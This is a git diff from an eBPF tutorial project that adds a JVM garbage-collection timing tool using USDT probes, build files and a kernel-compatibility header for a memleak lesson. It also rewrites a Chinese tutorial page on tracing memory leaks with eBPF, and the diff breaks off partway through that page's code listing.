a/15-javagc/javagc.bpf.c b/15-javagc/javagc.bpf.c new file mode 100644 index 0000000..35535d9 --- /dev/null +++ b/15-javagc/javagc.bpf.c @@ -0,0 +1,81 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +/* Copyright (c) 2022 Chen Tao */ +#include +#include +#include +#include +#include "javagc.h" + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 100); + __type(key, uint32_t); + __type(value, struct data_t); +} data_map SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __type(key, int); + __type(value, int); +} perf_map SEC(".maps"); + +__u32 time; + +static int gc_start(struct pt_regs *ctx) +{ + struct data_t data = {}; + + data.cpu = bpf_get_smp_processor_id(); + data.pid = bpf_get_current_pid_tgid() >> 32; + data.ts = bpf_ktime_get_ns(); + bpf_map_update_elem(&data_map, &data.pid, &data, 0); + return 0; +} + +static int gc_end(struct pt_regs *ctx) +{ + struct data_t data = {}; + struct data_t *p; + __u32 val; + + data.cpu = bpf_get_smp_processor_id(); + data.pid = bpf_get_current_pid_tgid() >> 32; + data.ts = bpf_ktime_get_ns(); + p = bpf_map_lookup_elem(&data_map, &data.pid); + if (!p) + return 0; + + val = data.ts - p->ts; + if (val > time) { + data.ts = val; + bpf_perf_event_output(ctx, &perf_map, BPF_F_CURRENT_CPU, &data, sizeof(data)); + } + bpf_map_delete_elem(&data_map, &data.pid); + return 0; +} + +SEC("usdt") +int handle_gc_start(struct pt_regs *ctx) +{ + return gc_start(ctx); +} + +SEC("usdt") +int handle_gc_end(struct pt_regs *ctx) +{ + return gc_end(ctx); +} + +SEC("usdt") +int handle_mem_pool_gc_start(struct pt_regs *ctx) +{ + return gc_start(ctx); +} + +SEC("usdt") +int handle_mem_pool_gc_end(struct pt_regs *ctx) +{ + return gc_end(ctx); +} + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; diff --git a/15-javagc/javagc.c b/15-javagc/javagc.c new file mode 100644 index 0000000..883ae70 --- /dev/null +++ b/15-javagc/javagc.c @@ -0,0 +1,243 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +/* + * Copyright (c) 2022 Chen Tao + * Based on ugc from BCC by Sasha Goldshtein + * Create: Wed Jun 29 16:00:19 2022 + */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "javagc.skel.h" +#include "javagc.h" + +#define BINARY_PATH_SIZE (256) +#define PERF_BUFFER_PAGES (32) +#define PERF_POLL_TIMEOUT_MS (200) + +static struct env { + pid_t pid; + int time; + bool exiting; + bool verbose; +} env = { + .pid = -1, + .time = 1000, + .exiting = false, + .verbose = false, +}; + +const char *argp_program_version = "javagc 0.1"; +const char *argp_program_bug_address = + "https://github.com/iovisor/bcc/tree/master/libbpf-tools"; + +const char argp_program_doc[] = +"Monitor javagc time cost.\n" +"\n" +"USAGE: javagc [--help] [-p PID] [-t GC time]\n" +"\n" +"EXAMPLES:\n" +"javagc -p 185 # trace PID 185 only\n" +"javagc -p 185 -t 100 # trace PID 185 java gc time beyond 100us\n"; + +static const struct argp_option opts[] = { + { "pid", 'p', "PID", 0, "Trace this PID only" }, + { "time", 't', "TIME", 0, "Java gc time" }, + { "verbose", 'v', NULL, 0, "Verbose debug output" }, + { NULL, 'h', NULL, OPTION_HIDDEN, "Show the full help" }, + {}, +}; + +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + int err = 0; + + switch (key) { + case 'h': + argp_state_help(state, stderr, ARGP_HELP_STD_HELP); + break; + case 'v': + env.verbose = true; + break; + case 'p': + errno = 0; + env.pid = strtol(arg, NULL, 10); + if (errno) { + err = errno; + fprintf(stderr, "invalid PID: %s\n", arg); + argp_usage(state); + } + break; + case 't': + errno = 0; + env.time = strtol(arg, NULL, 10); + if (errno) { + err = errno; + fprintf(stderr, "invalid time: %s\n", arg); + argp_usage(state); + } + break; + default: + return ARGP_ERR_UNKNOWN; + } + return err; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + if (level == LIBBPF_DEBUG && ! env.verbose) + return 0; + + return vfprintf(stderr, format, args); +} + +static void handle_event(void *ctx, int cpu, void *data, __u32 data_sz) +{ + struct data_t *e = (struct data_t *)data; + struct tm *tm = NULL; + char ts[16]; + time_t t; + + time(&t); + tm = localtime(&t); + strftime(ts, sizeof(ts), "%H:%M:%S", tm); + printf("%-8s %-7d %-7d %-7lld\n", ts, e->cpu, e->pid, e->ts/1000); +} + +static void handle_lost_events(void *ctx, int cpu, __u64 data_sz) +{ + printf("lost data\n"); +} + +static void sig_handler(int sig) +{ + env.exiting = true; +} + +static int get_jvmso_path(char *path) +{ + char mode[16], line[128], buf[64]; + size_t seg_start, seg_end, seg_off; + FILE *f; + int i = 0; + + sprintf(buf, "/proc/%d/maps", env.pid); + f = fopen(buf, "r"); + if (!f) + return -1; + + while (fscanf(f, "%zx-%zx %s %zx %*s %*d%[^\n]\n", + &seg_start, &seg_end, mode, &seg_off, line) == 5) { + i = 0; + while (isblank(line[i])) + i++; + if (strstr(line + i, "libjvm.so")) { + break; + } + } + + strcpy(path, line + i); + fclose(f); + + return 0; +} + +int main(int argc, char **argv) +{ + static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, + }; + char binary_path[BINARY_PATH_SIZE] = {0}; + struct javagc_bpf *skel = NULL; + int err; + struct perf_buffer *pb = NULL; + + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) + return err; + + /* + * libbpf will auto load the so if it in /usr/lib64 /usr/lib etc, + * but the jvmso not there. + */ + err = get_jvmso_path(binary_path); + if (err) + return err; + + libbpf_set_print(libbpf_print_fn); + + skel = javagc_bpf__open(); + if (!skel) { + fprintf(stderr, "Failed to open BPF skeleton\n"); + return 1; + } + skel->bss->time = env.time * 1000; + + err = javagc_bpf__load(skel); + if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + skel->links.handle_mem_pool_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, + binary_path, "hotspot", "mem__pool__gc__begin", NULL); + if (!skel->links.handle_mem_pool_gc_start) { + err = errno; + fprintf(stderr, "attach usdt mem__pool__gc__begin failed: %s\n", strerror(err)); + goto cleanup; + } + + skel->links.handle_mem_pool_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid, + binary_path, "hotspot", "mem__pool__gc__end", NULL); + if (!skel->links.handle_mem_pool_gc_end) { + err = errno; + fprintf(stderr, "attach usdt mem__pool__gc__end failed: %s\n", strerror(err)); + goto cleanup; + } + + skel->links.handle_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, + binary_path, "hotspot", "gc__begin", NULL); + if (!skel->links.handle_gc_start) { + err = errno; + fprintf(stderr, "attach usdt gc__begin failed: %s\n", strerror(err)); + goto cleanup; + } + + skel->links.handle_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid, + binary_path, "hotspot", "gc__end", NULL); + if (!skel->links.handle_gc_end) { + err = errno; + fprintf(stderr, "attach usdt gc__end failed: %s\n", strerror(err)); + goto cleanup; + } + + signal(SIGINT, sig_handler); + printf("Tracing javagc time... Hit Ctrl-C to end.\n"); + printf("%-8s %-7s %-7s %-7s\n", + "TIME", "CPU", "PID", "GC TIME"); + + pb = perf_buffer__new(bpf_map__fd(skel->maps.perf_map), PERF_BUFFER_PAGES, + handle_event, handle_lost_events, NULL, NULL); + while (!env.exiting) { + err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS); + if (err < 0 && err != -EINTR) { + fprintf(stderr, "error polling perf buffer: %s\n", strerror(-err)); + goto cleanup; + } + /* reset err to return 0 if exiting */ + err = 0; + } + +cleanup: + perf_buffer__free(pb); + javagc_bpf__destroy(skel); + + return err != 0; +} diff --git a/15-javagc/javagc.h b/15-javagc/javagc.h new file mode 100644 index 0000000..878f7db --- /dev/null +++ b/15-javagc/javagc.h @@ -0,0 +1,12 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +/* Copyright (c) 2022 Chen Tao */ +#ifndef __JAVAGC_H +#define __JAVAGC_H + +struct data_t { + __u32 cpu; + __u32 pid; + __u64 ts; +}; + +#endif /* __JAVAGC_H */ diff --git a/15-javagc/tests/HelloWorld.java b/15-javagc/tests/HelloWorld.java new file mode 100644 index 0000000..bb57053 --- /dev/null +++ b/15-javagc/tests/HelloWorld.java @@ -0,0 +1,15 @@ +public class HelloWorld { + public static void main(String[] args) { + // loop and sleep for 1 second + while (true) { + System.out.println("Hello World!"); + // create an object and let it go out of scope + Object obj = new Object(); + try { + Thread.sleep(1000); + } catch (InterruptedException e) { + e.printStackTrace(); + } + } + } +} diff --git a/15-javagc/tests/Makefile b/15-javagc/tests/Makefile new file mode 100644 index 0000000..8dd6e4f --- /dev/null +++ b/15-javagc/tests/Makefile @@ -0,0 +1,3 @@ +test: + javac HelloWorld.java + java HelloWorld \ No newline at end of file diff --git a/15-tcprtt/index.html b/15-tcprtt/index.html index 88f8301..d259747 100644 --- a/15-tcprtt/index.html +++ b/15-tcprtt/index.html @@ -83,7 +83,7 @@ diff --git a/16-memleak/.gitignore b/16-memleak/.gitignore new file mode 100644 index 0000000..3bbbd45 --- /dev/null +++ b/16-memleak/.gitignore @@ -0,0 +1,8 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +memleak diff --git a/16-memleak/Makefile b/16-memleak/Makefile new file mode 100644 index 0000000..84ead7e --- /dev/null +++ b/16-memleak/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = memleak # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/16-memleak/core_fixes.bpf.h b/16-memleak/core_fixes.bpf.h new file mode 100644 index 0000000..552c9fa --- /dev/null +++ b/16-memleak/core_fixes.bpf.h @@ -0,0 +1,169 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +/* Copyright (c) 2021 Hengqi Chen */ + +#ifndef __CORE_FIXES_BPF_H +#define __CORE_FIXES_BPF_H + +#include +#include + +/** + * commit 2f064a59a1 ("sched: Change task_struct::state") changes + * the name of task_struct::state to task_struct::__state + * see: + * https://github.com/torvalds/linux/commit/2f064a59a1 + */ +struct task_struct___o { + volatile long int state; +} __attribute__((preserve_access_index)); + +struct task_struct___x { + unsigned int __state; +} __attribute__((preserve_access_index)); + +static __always_inline __s64 get_task_state(void *task) +{ + struct task_struct___x *t = task; + + if (bpf_core_field_exists(t->__state)) + return BPF_CORE_READ(t, __state); + return BPF_CORE_READ((struct task_struct___o *)task, state); +} + +/** + * commit 309dca309fc3 ("block: store a block_device pointer in struct bio") + * adds a new member bi_bdev which is a pointer to struct block_device + * see: + * https://github.com/torvalds/linux/commit/309dca309fc3 + */ +struct bio___o { + struct gendisk *bi_disk; +} __attribute__((preserve_access_index)); + +struct bio___x { + struct block_device *bi_bdev; +} __attribute__((preserve_access_index)); + +static __always_inline struct gendisk *get_gendisk(void *bio) +{ + struct bio___x *b = bio; + + if (bpf_core_field_exists(b->bi_bdev)) + return BPF_CORE_READ(b, bi_bdev, bd_disk); + return BPF_CORE_READ((struct bio___o *)bio, bi_disk); +} + +/** + * commit d5869fdc189f ("block: introduce block_rq_error tracepoint") + * adds a new tracepoint block_rq_error and it shares the same arguments + * with tracepoint block_rq_complete. As a result, the kernel BTF now has + * a `struct trace_event_raw_block_rq_completion` instead of + * `struct trace_event_raw_block_rq_complete`. + * see: + * https://github.com/torvalds/linux/commit/d5869fdc189f + */ +struct trace_event_raw_block_rq_complete___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; +} __attribute__((preserve_access_index)); + +struct trace_event_raw_block_rq_completion___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; +} __attribute__((preserve_access_index)); + +static __always_inline bool has_block_rq_completion() +{ + if (bpf_core_type_exists(struct trace_event_raw_block_rq_completion___x)) + return true; + return false; +} + +/** + * commit d152c682f03c ("block: add an explicit ->disk backpointer to the + * request_queue") and commit f3fa33acca9f ("block: remove the ->rq_disk + * field in struct request") make some changes to `struct request` and + * `struct request_queue`. Now, to get the `struct gendisk *` field in a CO-RE + * way, we need both `struct request` and `struct request_queue`. + * see: + * https://github.com/torvalds/linux/commit/d152c682f03c + * https://github.com/torvalds/linux/commit/f3fa33acca9f + */ +struct request_queue___x { + struct gendisk *disk; +} __attribute__((preserve_access_index)); + +struct request___x { + struct request_queue___x *q; + struct gendisk *rq_disk; +} __attribute__((preserve_access_index)); + +static __always_inline struct gendisk *get_disk(void *request) +{ + struct request___x *r = request; + + if (bpf_core_field_exists(r->rq_disk)) + return BPF_CORE_READ(r, rq_disk); + return BPF_CORE_READ(r, q, disk); +} + +/** + * commit 6521f8917082("namei: prepare for idmapped mounts") add `struct + * user_namespace *mnt_userns` as vfs_create() and vfs_unlink() first argument. + * At the same time, struct renamedata {} add `struct user_namespace + * *old_mnt_userns` item. Now, to kprobe vfs_create()/vfs_unlink() in a CO-RE + * way, determine whether there is a `old_mnt_userns` field for `struct + * renamedata` to decide which input parameter of the vfs_create() to use as + * `dentry`. + * see: + * https://github.com/torvalds/linux/commit/6521f8917082 + */ +struct renamedata___x { + struct user_namespace *old_mnt_userns; +} __attribute__((preserve_access_index)); + +static __always_inline bool renamedata_has_old_mnt_userns_field(void) +{ + if (bpf_core_field_exists(struct renamedata___x, old_mnt_userns)) + return true; + return false; +} + +/** + * commit 3544de8ee6e4("mm, tracing: record slab name for kmem_cache_free()") + * replaces `trace_event_raw_kmem_free` with `trace_event_raw_kfree` and adds + * `tracepoint_kmem_cache_free` to enhance the information recorded for + * `kmem_cache_free`. + * see: + * https://github.com/torvalds/linux/commit/3544de8ee6e4 + */ + +struct trace_event_raw_kmem_free___x { + const void *ptr; +} __attribute__((preserve_access_index)); + +struct trace_event_raw_kfree___x { + const void *ptr; +} __attribute__((preserve_access_index)); + +struct trace_event_raw_kmem_cache_free___x { + const void *ptr; +} __attribute__((preserve_access_index)); + +static __always_inline bool has_kfree() +{ + if (bpf_core_type_exists(struct trace_event_raw_kfree___x)) + return true; + return false; +} + +static __always_inline bool has_kmem_cache_free() +{ + if (bpf_core_type_exists(struct trace_event_raw_kmem_cache_free___x)) + return true; + return false; +} + +#endif /* __CORE_FIXES_BPF_H */ diff --git a/16-memleak/index.html b/16-memleak/index.html index 7a7323a..f167551 100644 --- a/16-memleak/index.html +++ b/16-memleak/index.html @@ -83,7 +83,7 @@ @@ -144,212 +144,374 @@
-

eBPF 入门实践教程:编写 eBPF 程序 Memleak 监控内存泄漏

-

背景

-

内存泄漏对于一个程序而言是一个很严重的问题。倘若放任一个存在内存泄漏的程序运行,久而久之 -系统的内存会慢慢被耗尽,导致程序运行速度显著下降。为了避免这一情况,memleak工具被提出。 -它可以跟踪并匹配内存分配和释放的请求,并且打印出已经被分配资源而又尚未释放的堆栈信息。

-

实现原理

-

memleak 的实现逻辑非常直观。它在我们常用的动态分配内存的函数接口路径上挂载了ebpf程序, -同时在free上也挂载了ebpf程序。在调用分配内存相关函数时,memleak 会记录调用者的pid,分配得到 -内存的地址,分配得到的内存大小等基本数据。在free之后,memeleak则会去map中删除记录的对应的分配 -信息。对于用户态常用的分配函数 malloc, calloc 等,memleak使用了 uporbe 技术实现挂载,对于 -内核态的函数,比如 kmalloc 等,memleak 则使用了现有的 tracepoint 来实现。

-

编写 eBPF 程序

-
struct {
-	__uint(type, BPF_MAP_TYPE_HASH);
-	__type(key, pid_t);
-	__type(value, u64);
-	__uint(max_entries, 10240);
-} sizes SEC(".maps");
+                        

eBPF 入门实践教程十六:编写 eBPF 程序 Memleak 监控内存泄漏

+

eBPF(扩展的伯克利数据包过滤器)是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。

+

在本篇教程中,我们将探讨如何使用 eBPF 编写 Memleak 程序,以监控程序的内存泄漏。

+

背景及其重要性

+

内存泄漏是计算机编程中的一种常见问题,其严重程度不应被低估。内存泄漏发生时,程序会逐渐消耗更多的内存资源,但并未正确释放。随着时间的推移,这种行为会导致系统内存逐渐耗尽,从而显著降低程序及系统的整体性能。

+

内存泄漏有多种可能的原因。这可能是由于配置错误导致的,例如程序错误地配置了某些资源的动态分配。它也可能是由于软件缺陷或错误的内存管理策略导致的,如在程序执行过程中忘记释放不再需要的内存。此外,如果一个应用程序的内存使用量过大,那么系统性能可能会因页面交换(swapping)而大幅下降,甚至可能导致应用程序被系统强制终止(Linux 的 OOM killer)。

+

调试内存泄漏的挑战

+

调试内存泄漏问题是一项复杂且挑战性的任务。这涉及到详细检查应用程序的配置、内存分配和释放情况,通常需要应用专门的工具来帮助诊断。例如,有一些工具可以在应用程序启动时将 malloc() 函数调用与特定的检测工具关联起来,如 Valgrind memcheck,这类工具可以模拟 CPU 来检查所有内存访问,但可能会导致应用程序运行速度大大减慢。另一个选择是使用堆分析器,如 libtcmalloc,它相对较快,但仍可能使应用程序运行速度降低五倍以上。此外,还有一些工具,如 gdb,可以获取应用程序的核心转储并进行后处理以分析内存使用情况。然而,这些工具通常在获取核心转储时需要暂停应用程序,或在应用程序终止后才能调用 free() 函数。

+

eBPF 的作用

+

在这种背景下,eBPF 的作用就显得尤为重要。eBPF 提供了一种高效的机制来监控和追踪系统级别的事件,包括内存的分配和释放。通过 eBPF,我们可以跟踪内存分配和释放的请求,并收集每次分配的调用堆栈。然后,我们可以分

+

析这些信息,找出执行了内存分配但未执行释放操作的调用堆栈,这有助于我们找出导致内存泄漏的源头。这种方式的优点在于,它可以实时地在运行的应用程序中进行,而无需暂停应用程序或进行复杂的前后处理。

+

memleak eBPF 工具可以跟踪并匹配内存分配和释放的请求,并收集每次分配的调用堆栈。随后,memleak 可以打印一个总结,表明哪些调用堆栈执行了分配,但是并没有随后进行释放。例如,我们运行命令:

+
# ./memleak -p $(pidof allocs)
+Attaching to pid 5193, Ctrl+C to quit.
+[11:16:33] Top 2 stacks with outstanding allocations:
+        80 bytes in 5 allocations from stack
+                 main+0x6d [allocs]
+                 __libc_start_main+0xf0 [libc-2.21.so]
 
-struct {
-	__uint(type, BPF_MAP_TYPE_HASH);
-	__type(key, u64); /* address */
-	__type(value, struct alloc_info);
-	__uint(max_entries, ALLOCS_MAX_ENTRIES);
-} allocs SEC(".maps");
+[11:16:34] Top 2 stacks with outstanding allocations:
+        160 bytes in 10 allocations from stack
+                 main+0x6d [allocs]
+                 __libc_start_main+0xf0 [libc-2.21.so]
+
+

运行这个命令后,我们可以看到分配但未释放的内存来自于哪些堆栈,并且可以看到这些未释放的内存的大小和数量。

+

随着时间的推移,很显然,allocs 进程的 main 函数正在泄漏内存,每次泄漏 16 字节。幸运的是,我们不需要检查每个分配,我们得到了一个很好的总结,告诉我们哪个堆栈负责大量的泄漏。

+

memleak 的实现原理

+

在基本层面上,memleak 的工作方式类似于在内存分配和释放路径上安装监控设备。它通过在内存分配和释放函数中插入 eBPF 程序来达到这个目标。这意味着,当这些函数被调用时,memleak 就会记录一些重要信息,如调用者的进程 ID(PID)、分配的内存地址以及分配的内存大小等。当释放内存的函数被调用时,memleak 则会在其内部的映射表(map)中删除相应的内存分配记录。这种机制使得 memleak 能够准确地追踪到哪些内存块已被分配但未被释放。

+

对于用户态的常用内存分配函数,如 malloccalloc 等,memleak 利用了用户态探测(uprobe)技术来实现监控。uprobe 是一种用于用户空间应用程序的动态追踪技术,它可以在运行时不修改二进制文件的情况下在任意位置设置断点,从而实现对特定函数调用的追踪。

+

对于内核态的内存分配函数,如 kmalloc 等,memleak 则选择使用了 tracepoint 来实现监控。Tracepoint 是一种在 Linux 内核中提供的动态追踪技术,它可以在内核运行时动态地追踪特定的事件,而无需重新编译内核或加载内核模块。

+

内核态 eBPF 程序实现

+

memleak 内核态 eBPF 程序实现

+

memleak 的内核态 eBPF 程序包含一些用于跟踪内存分配和释放的关键函数。在我们深入了解这些函数之前,让我们首先观察 memleak 所定义的一些数据结构,这些结构在其内核态和用户态程序中均有使用。

+
#ifndef __MEMLEAK_H
+#define __MEMLEAK_H
 
-struct {
-	__uint(type, BPF_MAP_TYPE_HASH);
-	__type(key, u64); /* stack id */
-	__type(value, union combined_alloc_info);
-	__uint(max_entries, COMBINED_ALLOCS_MAX_ENTRIES);
-} combined_allocs SEC(".maps");
-
-struct {
-	__uint(type, BPF_MAP_TYPE_HASH);
-	__type(key, u64);
-	__type(value, u64);
-	__uint(max_entries, 10240);
-} memptrs SEC(".maps");
-
-struct {
-	__uint(type, BPF_MAP_TYPE_STACK_TRACE);
-	__type(key, u32);
-} stack_traces SEC(".maps"); 
+#define ALLOCS_MAX_ENTRIES 1000000
+#define COMBINED_ALLOCS_MAX_ENTRIES 10240
 
 struct alloc_info {
-	__u64 size;
-	__u64 timestamp_ns;
-	int stack_id;
+    __u64 size;            // 分配的内存大小
+    __u64 timestamp_ns;    // 分配时的时间戳,单位为纳秒
+    int stack_id;          // 分配时的调用堆栈ID
 };
 
 union combined_alloc_info {
-	struct {
-		__u64 total_size : 40;
-		__u64 number_of_allocs : 24;
-	};
-	__u64 bits;
+    struct {
+        __u64 total_size : 40;        // 所有未释放分配的总大小
+        __u64 number_of_allocs : 24;   // 所有未释放分配的总次数
+    };
+    __u64 bits;    // 结构的位图表示
 };
+
+#endif /* __MEMLEAK_H */
 
-

这段代码定义了memleak工具中使用的5个BPF Map:

-
    -
  • sizes用于记录程序中每个内存分配请求的大小;
  • -
  • allocs用于跟踪每个内存分配请求的详细信息,包括请求的大小、堆栈信息等;
  • -
  • combined_allocs的键是堆栈的唯一标识符(stack id),值是一个combined_alloc_info联合体,用于记录该堆栈的内存分配总大小和内存分配数量;
  • -
  • memptrs用于跟踪每个内存分配请求返回的指针,以便在内存释放请求到来时找到对应的内存分配请求;
  • -
  • stack_traces是一个堆栈跟踪类型的哈希表,用于存储每个线程的堆栈信息(key为线程id,value为堆栈跟踪信息)以便在内存分配和释放请求到来时能够追踪和分析相应的堆栈信息。
  • -
-

其中combined_alloc_info是一个联合体,其中包含一个结构体和一个unsigned long long类型的变量bits。结构体中的两个成员变量total_size和number_of_allocs分别表示总分配大小和分配的次数。其中40和24分别表示total_size和number_of_allocs这两个成员变量所占用的位数,用来限制其大小。通过这样的位数限制,可以节省combined_alloc_info结构的存储空间。同时,由于total_size和number_of_allocs在存储时是共用一个unsigned long long类型的变量bits,因此可以通过在成员变量bits上进行位运算来访问和修改total_size和number_of_allocs,从而避免了在程序中定义额外的变量和函数的复杂性。

-
static int gen_alloc_enter(size_t size)
-{
-	if (size < min_size || size > max_size)
-		return 0;
+

这里定义了两个主要的数据结构:alloc_infocombined_alloc_info

+

alloc_info 结构体包含了一个内存分配的基本信息,包括分配的内存大小 size、分配发生时的时间戳 timestamp_ns,以及触发分配的调用堆栈 ID stack_id

+

combined_alloc_info 是一个联合体(union),它包含一个嵌入的结构体和一个 __u64 类型的位图表示 bits。嵌入的结构体有两个成员:total_sizenumber_of_allocs,分别代表所有未释放分配的总大小和总次数。其中 40 和 24 分别表示 total_size 和 number_of_allocs这两个成员变量所占用的位数,用来限制其大小。通过这样的位数限制,可以节省combined_alloc_info结构的存储空间。同时,由于total_size和number_of_allocs在存储时是共用一个unsigned long long类型的变量bits,因此可以通过在成员变量bits上进行位运算来访问和修改total_size和number_of_allocs,从而避免了在程序中定义额外的变量和函数的复杂性。

+

接下来,memleak 定义了一系列用于保存内存分配信息和分析结果的 eBPF 映射(maps)。这些映射都以 SEC(".maps") 的形式定义,表示它们属于 eBPF 程序的映射部分。

+
const volatile size_t min_size = 0;
+const volatile size_t max_size = -1;
+const volatile size_t page_size = 4096;
+const volatile __u64 sample_rate = 1;
+const volatile bool trace_all = false;
+const volatile __u64 stack_flags = 0;
+const volatile bool wa_missing_free = false;
 
